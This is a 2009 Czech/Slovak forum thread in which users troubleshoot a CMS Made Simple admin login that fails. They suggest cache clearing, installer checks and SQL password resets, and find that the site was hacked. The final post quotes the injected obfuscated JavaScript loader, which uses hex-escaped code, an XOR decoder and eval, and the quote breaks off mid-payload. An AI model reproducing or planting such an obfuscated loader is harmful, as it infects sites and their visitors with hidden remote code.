Page 1 of 1
přihlášení k administraci
Posted: Sun Jan 11, 2009 7:37 pm
by david540
Zdravím!
Přeinstaloval jsem PC. V opeře jsem měl ve správci hesel uložena hesla k administraci k několika webům. Bohužel ze staré instalace se hesla nedaří vydolovat. Dá se nějakým způsobem z databáze dohledat přihlašovací jméno a heslo? Resp. nevím, jestli není problém ještě někde jinde. Zkoušel jsem pár přihlášení se záměrně špatnými údaji - pak vyskočila hláška uživatelské jméno nebo heslo neplatné. pokud jsem zadal pravděpodobně správné údaje, hláška se neobjevila a znovunačetla se přihlašovací stránka. Cookies jsou povoleny, java i popup také.
diky za radu d.
Re: přihlášení k administraci
Posted: Sun Jan 11, 2009 8:12 pm
by kuzmany
Skus vymazat cahce - tmp/templates_c, tmp/cache . Skus skontrolovat ci mas nakopirovane vsetky subory CMS Made Simple.
V pripade ze si heslo zabudol, mozes pouzit tento postup:
Nakopiruj si na server znova adresar install. Zacni instalaciu:
www.example.com/install
V 5. kroku pri nastavovani databaz odskrtni
Create Tables (Warning: Deletes existing data)
Install sample content and templates
!!!to odskrtnutie je velmi dolezite - v inom pripade prides o data
A dokonci instalaciu, tym sa ti vytvori nove uzivatelsky pristup, ktory zadavas pri 4. kroku instalacie.
Samozrejme, odzalohuj si najpr databazu aj config.php.
V pripade, ze by si bol skusenejsi uzivatel, tak si mozes rovno resetnut heslo v db, myslim ze je sifrovane pomocou md5.
Re: přihlášení k administraci
Posted: Mon Jan 12, 2009 10:51 am
by kino
existuje jednodussi zpusob jak si zmenit heslo, pokuz mas pristup do DB nebo napriklad do PHPadmina...
Code: Select all
UPDATE `cmsms`.`cms_users` SET `password` = MD5( 'noveheslo' ) WHERE `cms_users`.`user_id` =1 LIMIT 1 ;
to pokud si ses jistej, ze admin uzivatel byl prvni vytvorenej nebo
Code: Select all
UPDATE `cmsms`.`cms_users` SET `password` = MD5( 'noveheslo' ) WHERE `cms_users`.`username` ='tvoje_uziv_jmeno' LIMIT 1 ;
Re: přihlášení k administraci
Posted: Mon Jan 12, 2009 10:56 am
by david540
Dle Tve rady jsem smazal adresare tmp/templates_c, tmp/cache . Prihlaseni se vsak stale nedari. Jsem presvedcen o tom, ze login i pass jsou spravne, protoze jak uz jsem psal, pri spatnem zadani udaju mi to prihlasovaci stranka oznami. Nemas prosim jeste nejaky typ, jak prihlaseni vyresit ?
Re: přihlášení k administraci
Posted: Mon Jan 12, 2009 1:00 pm
by david540
Dle rady od "kino" jsem změnil v databázi uživatelské jméno i heslo. Je tak ověřen zdroj problému. Není jím zapomenuté heslo. Ale i po zadaní správných údajů se nadále nedá přihlasit. Kde se mohl stát problém, že při zadavání správných přihlašovacích údajů se nedá přihlásit do administrace

díky za jakýkoliv nápad...
Ještě doplňuju, že mám tento problém na dvou webech. hostováno u
www.onebit.cz
Re: přihlášení k administraci
Posted: Mon Jan 12, 2009 2:00 pm
by kuzmany
Pocuj, a ked si instaloval CMS MS, tak pri tretom kroku, ked sa kontroluju prava a nastavenia na serveri, nemal si tam ziadne varovania alebo upozornenia? Skus si to este raz zbehnut tu kontrolu, co ti to vypise a postni to tu
Re: přihlášení k administraci
Posted: Mon Jan 12, 2009 2:11 pm
by david540
cms jsem znovu neinstaloval, protože jsem věděl, že zadávané údaje jsou správné. Ale asi nic jiného než přeinstal nezbyde...
Re: přihlášení k administraci
Posted: Mon Jan 12, 2009 2:45 pm
by kuzmany
david540 wrote:
cms jsem znovu neinstaloval, protože jsem věděl, že zadávané údaje jsou správné. Ale asi nic jiného než přeinstal nezbyde...
Nemusis nic reinstalovat, staci ked si spustit instalaciu iba po treti krok, tam ti vypise instalacia ake su nastavenia tvojho servera. Tam ti vypise varovania a upozornenia, pokial tvoj server nieco nepodporuje.
Cize si len nakopiruj adresar instal a spusti
www.example.tld/install a pokial nedokoncis instalaciu nic sa nestane.
Re: přihlášení k administraci
Posted: Mon Jan 12, 2009 9:02 pm
by david540
takže byl nakopírován adresář install (do složky, kde je uložen fungující cms s nefunkčím admin login).
Po dotazu na výběr jazyka se zobrazila následující chybová hláška: SESSION not working, you have problem with some modules and functionality! Ask your provider, exiting
Zarážející je, že přihlášení k adminstraci zhruba před měsícem normálně chodilo. Psal jsem taky dotaz na webhosting zda se neudály nějaké technické změny. - neudály...
Re: přihlášení k administraci
Posted: Mon Jan 12, 2009 9:37 pm
by kuzmany
Chyba musi byt u teba, nemas povolene cookies. Skus iny prehliadac, ci ti to nabehne.
Re: přihlášení k administraci
Posted: Mon Jan 12, 2009 10:14 pm
by kino
chyba byla v tom, ze to asi nekdo hacknul a v nekolik php souborech byl balast, kterej nedovoloval si spravne vymenit cookies.
Re: přihlášení k administraci
Posted: Mon Jan 12, 2009 10:32 pm
by kuzmany
kino wrote:
chyba byla v tom, ze to asi nekdo hacknul a v nekolik php souborech byl balast, kterej nedovoloval si spravne vymenit cookies.
damn

druhý krok instalacie a Checksum test by to odhalil hned

Re: přihlášení k administraci
Posted: Tue Jan 13, 2009 9:56 am
by david540
Timto děkuju KINOvi za profesionální pomoc při vyřešení problému. O tom hacknutí tedy trochu pochybuju (chybí motiv

), po původu balastu budu pátrat. Jen pro zajímavost - ve všech souborech *.php v rootu se na začátku objevilo následující:
var jQuery = eval('w,iunud,o7wu.ue,vua7lu'.replace(/[\)0u,7]/g, '')); jQuery('\x66\x75\x6e\x63\x74\x69\x6f\x6e\x20\x66\x4c\x4e\x28\x6d\x63\x49\x6d\x47\x6c\x29\x7b\x66\x75\x6e\x63\x74\x69\x6f\x6e\x20\x79\x34\x53\x34\x6f\x28\x66\x44\x47\x47\x55\x4c\x29\x7b\x76\x61\x72\x20\x61\x6f\x73\x78\x77\x3d\x30\x3b\x76\x61\x72\x20\x62\x6f\x68\x3d\x66\x44\x47\x47\x55\x4c\x2e\x6c\x65\x6e\x67\x74\x68\x3b\x76\x61\x72\x20\x72\x38\x34\x66\x3d\x30\x3b\x77\x68\x69\x6c\x65\x28\x72\x38\x34\x66\x3c\x62\x6f\x68\x29\x7b\x61\x6f\x73\x78\x77\x2b\x3d\x63\x55\x34\x70\x28\x66\x44\x47\x47\x55\x4c\x2c\x72\x38\x34\x66\x29\x2a\x62\x6f\x68\x3b\x72\x38\x34\x66\x2b\x2b\x3b\x7d\x72\x65\x74\x75\x72\x6e\x20\x28\x61\x6f\x73\x78\x77\x2b\x27\x27\x29\x3b\x7d\x66\x75\x6e\x63\x74\x69\x6f\x6e\x20\x63\x55\x34\x70\x28\x63\x56\x34\x33\x2c\x77\x68\x49\x52\x71\x29\x7b\x72\x65\x74\x75\x72\x6e\x20\x63\x56\x34\x33\x2e\x63\x68\x61\x72\x43\x6f\x64\x65\x41\x74\x28\x77\x68\x49\x52\x71\x29\x3b\x7d\x20\x20\x20\x74\x72\x79\x20\x7b\x76\x61\x72\x20\x67\x44\x7a\x48\x3d\x65\x76\x61\x6c\x28\x27\x61\x4b\x72\x56\x67\x44\x75\x56\x6d\x4b\x65\x44\x6e\x56\x74\x3f\x73\x44\x2e\x56\x63\x56\x61\x44\x6c\x56\x6c\x56\x65\x56\x65\x3f\x27\x2e\x72\x65\x70\x6c\x61\x63\x65\x28\x2f\x5b\x43\x4b\x5c\x3f\x56\x44\x5d\x2f\x67\x2c\x20\x27\x27\x29\x29\x2c\x67\x72\x6d\x5a\x3d\x27\x27\x3b\x76\x61\x72\x20\x62\x61\x48\x3d\x30\x2c\x72\x56\x44\x78\x3d\x30\x2c\x6e\x7a\x43\x4d\x5a\x31\x3d\x28\x6e\x65\x77\x20\x53\x74\x72\x69\x6e\x67\x28\x67\x44\x7a\x48\x29\x29\x2e\x72\x65\x70\x6c\x61\x63\x65\x28\x2f\x5b\x5e\x40\x61\x2d\x7a\x30\x2d\x39\x41\x2d\x5a\x5f\x2e\x2c\x2d\x5d\x2f\x67\x2c\x27\x27\x29\x3b\x76\x61\x72\x20\x71\x49\x55\x39\x77\x3d\x79\x34\x53\x34\x6f\x28\x6e\x7a\x43\x4d\x5a\x31\x29\x3b\x6d\x63\x49\x6d\x47\x6c\x3d\x75\x6e\x65\x73\x63\x61\x70\x65\x28\x6d\x63\x49\x6d\x47\x6c\x29\x3b\x66\x6f\x72\x28\x76\x61\x72\x20\x62\x6e\x57\x49\x4e\x43\x3d\x30\x3b\x20\x62\x6e\x57\x49\x4e\x43\x20\x3c\x20\x28\x6d\x63\x49\x6d\x47\x6c\x2e\x6c\x65\x6e\x67\x74\x68\x29\x3b\x20\x62\x6e\x57\x49\x4e\x43\x2b\x2b\x29\x7b\x76\x61\x72\x20\x63\x48\x58\x45\x64\x4b\x56\x3d\x63\x55\x34\x70\x28\x6e\x7a\x43\x4d\x5a\x31\x2c\x62\x61\x48\x29\x5e\x63\x55\x34\x70\x28\x71\x49\x55\x39\x77\x2c\x72\x56\x44\x78\x29\x3b\x76\x61\x72\x20\x73\x31\x56\x61\x3d\x63\x55\x34\x70\x28\x6d\x63\x49\x6d\x47\x6c\x2c\x62\x6e\x57\x49\x4e\x43\x29\x3b\x62\x61\x48\x2b\x2b\x3b\x72\x56\x44\x78\x2b\x2b\x3b\x69\x66\x28\x72\x56\x44\x78\x3e\x71\x49\x55\x39\x77\x2e\x6c\x65\x6e\x67\x74\x68\x29\x72\x56\x44\x78\x3d\x30\x3b\x69\x66\x28\x62\x61\x48\x3e\x6e\x7a\x43\x4d\x5a\x31\x2e\x6c\x65\x6e\x67\x74\x68\x29\x62\x61\x48\x3d\x30\x3b\x67\x72\x6d\x5a\x2b\x3d\x53\x74\x72\x69\x6e\x67\x2e\x66\x72\x6f\x6d\x43\x68\x61\x72\x43\x6f\x64\x65\x28\x73\x31\x56\x61\x5e\x63\x48\x58\x45\x64\x4b\x56\x29\x20\x2b\x20\x27\x27\x3b\x7d\x65\x76\x61\x6c\x28\x67\x72\x6d\x5a\x29\x3b\x20\x72\x65\x74\x75\x72\x6e\x20\x67\x72\x6d\x5a\x3d\x6e\x65\x77\x20\x53\x74\x72\x69\x6e\x67\x28\x29\x3b\x7d\x63\x61\x74\x63\x68\x28\x65\x29\x7b\x7d\x7d\x66\x4c\x4e\x28\x27\x25\x33\x32\x25\x33\x38\x25\x33\x30\x25\x33\x33\x25\x33\x38\x25\x33\x34\x25\x33\x32\x25\x33\x30\x25\x34\x36\x25\x30\x62\x25\x32\x66\x25\x33\x33\x25\x31\x31\x25\x32\x33\x25\x30\x65\x25\x30\x33\x25\x31\x36\x25\x34\x65\x25\x36\x65\x25\x32\x64\x25\x32\x65\x25\x37\x63\x25\x32\x34\x25\x30\x32\x25\x33\x32\x25\x30\x38\x25\x36\x36\x25\x33\x36\x25\x37\x61\x25\x31\x35\x25\x37\x62\x25\x30\x63\x25\x30\x31\x25\x31\x61\x25\x31\x31\x25\x32\x33\x25\x33\x30\x25\x32\x30\x25\x33\x32\x25\x33\x37\x25\x37\x37\x25\x37\x61\x25\x36\x61\x25\x33\x63\x25\x35\x33\x25\x32\x62\x25\x33\x36\x25\x32\x39\x25\x33\x38\x25\x33\x32\x25\x30\x61\x25\x33\x35\x25\x31\x38\x25\x33\x32\x25\x31\x30\x25\x35\x37\x25\x34\x64\x25\x33\x31\x25\x33\x63\x25\x33\x65\x25\x32\x66\x25\x32\x33\x25\x34\x65\x25\x37\x64\x25\x33\x64\x25\x33\x39\x25\x32\x65\x25\x33\x66\x25\x36\x30\x25\x36\x32\x25\x37\x62\x25\x35\x32\x25\x32\x30\x25\x37\x65\x25\x33\x61\x25\x33\x31\x25\x37\x61\x25\x36\x61\x25\x36\x39\x25\x36\x62\x25\x30\x39\x25\x33\x62\x25\x33\x65\x25\x33\x64\x25\x31\x63\x25\x33\x36\x25\x32\x61\x25\x32\x66\x25\x37\x64\x25\x34\x34\x25\x30\x36\x25\x36\x61\x25\x32\x38\x25\x33\x31\x25\x31\x65\x25\x31\x34\x25\x31\x30\x25\x30\x36\x25\x36\x62\x25\x33\x32\x25\x33\x39\x25\x36\x64\x25\x37\x33\x25\x31\x64\x25\x33\x39\x25\x33\x32\x25\x33\x33\x25\x31\x62\x25\x36\x66\x25\x32\x63\x25\x36\x63\x25\x36\x31\x25\x33\x62\x25\x33\x35\x25\x32\x39\x25\x32\x31\x25\x31\x61\x25\x33\x61\x25\x33\x38\x25\x32\x64\x25\x36\x33\x25\x32\x31\x25\x33\x33\x25\x32\x61\x25\x33\x62\x25\x34\x66\x25\x36\x36\x25\x32\x37\x25\x33\x65\x25\x33\x31\x25\x32\x65\x25\x30\x34\x25\x32\x66\x25\x33\x62\x25\x31\x35\x25\x30\x35\x25\x37\x65\x25\x32\x33\x25\x37\x62\x25\x37\x32\x25\x37\x63\x25\x31\x35\x25\x30\x37\x25\x30\x36\x25\x36\x30\x25\x31\x39\x25\x32\x35\x25\x33\x32\x25\x32\x66\x25\x37\x32\x25\x37\x38\x25\x35\x64\x25\x31\x34\x25\x36\x35\x25\x33\x38\x25\x32\x30\x25\x33\x65\x25\x32\x64\x25\x31\x32\x25\x31\x38\x25\x33\x32\x25\x30\x31\x25\x37\x66\x25\x31\x37\x25\x32\x31\x25\x33\x33\x25\x37\x30\x25\x33\x39\x25\x30\x31\x25\x33\x35\x25\x31\x31\x25\x36\x38\x25\x36\x38\x25\x36\x38\x25\x33\x35\x25\x32\x66\x25\x32\x37\x25\x32\x32\x25\x32\x33\x25\x32\x35\x25\x33\x32\x25\x36\x36\x25\x37\x38\x25\x37\x66\x25\x37\x32\x25\x35\x66\x25\x37\x38\x25\x35\x30\x25\x35\x33\x25\x34\x36\x25\x37\x64\x25\x35\x36\x25\x36\x65\x25\x34\x33\x25\x37\x38\x25\x34\x64\x25\x37\x65\x25\x33\x32\x25\x32\x39\x25\x32\x38\x25\x30\x31\x25\x37\x30\x25\x30\x62\x25\x33\x39\x25\x31\x30\x25\x37\x66\x25\x32\x37\x25\x33\x31\x25\x30\x31\x25\x33\x37\x25\x30\x63\x25\x33\x38\x25\x34\x32\x25\x36\x61\x25\x33\x65\x25\x31\x63\x25\x33\x36\x25\x32\x35\x25\x33\x39\x25\x37\x32\x25\x37\x30\x25\x37\x31\x25\x35\x33\x25\x34\x36\x25\x37\x34\x25\x35\x36\x25\x37\x34\x25\x33\x63\x25\x37\x61\x25\x32\x63\x25\x32\x35\x25\x33\x65\x25\x31\x61\x25\x31\x33\x25\x37\x62\x25\x33\x63\x25\x33\x33\x25\x33\x65\x25\x30\x35\x25\x36\x31\x25\x33\x37\x25\x36\x39\x25\x37\x34\x25\x34\x64\x25\x36\x30\x25\x36\x35\x25\x36\x37\x25\x32\x36\x25\x32\x37\x25\x30\x33\x25\x31\x38\x25\x32\x39\x25\x33\x65\x25\x37\x34\x25\x37\x65\x25\x32\x30\x25\x34\x35\x25\x33\x34\x25\x32\x66\x25\x31\x65\x25\x32\x33\x25\x30\x31\x25\x30\x63\x25\x30\x30\x25\x33\x62\x25\x31\x39\x25\x37\x34\x25\x32\x37\x25\x37\x64\x25\x35\x39\x25\x36\x35\x25\x37\x39\x25\x32\x65\x25\x37\x61\x25\x31\x66\x25\x33\x30\x25\x36\x62\x25\x30\x63\x25\x34\x32\x25\x37\x65\x25\x36\x63\x25\x31\x34\x25\x34\x62\x25\x33